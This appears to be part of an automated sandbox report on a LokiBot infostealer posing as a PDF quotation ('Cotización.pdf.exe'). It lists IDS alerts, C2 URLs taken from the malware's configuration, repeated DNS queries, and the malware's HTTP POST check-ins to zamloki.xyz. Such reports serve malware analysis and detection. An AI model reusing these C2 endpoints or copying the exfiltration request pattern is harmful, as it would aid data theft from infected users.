              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49870 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49870 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49871 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49871 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49871 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49872 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49872 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49872 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49873 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49873 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49873 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49874 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49874 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49874 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49875 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49875 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49875 -> 172.67.155.45:80
              C2 URLs / IPs found in malware configurationShow sources
              Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
              Performs DNS queries to domains with low reputationShow sources
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: DNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
              Source: DNS query: zamloki.xyz
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 190Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 190Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
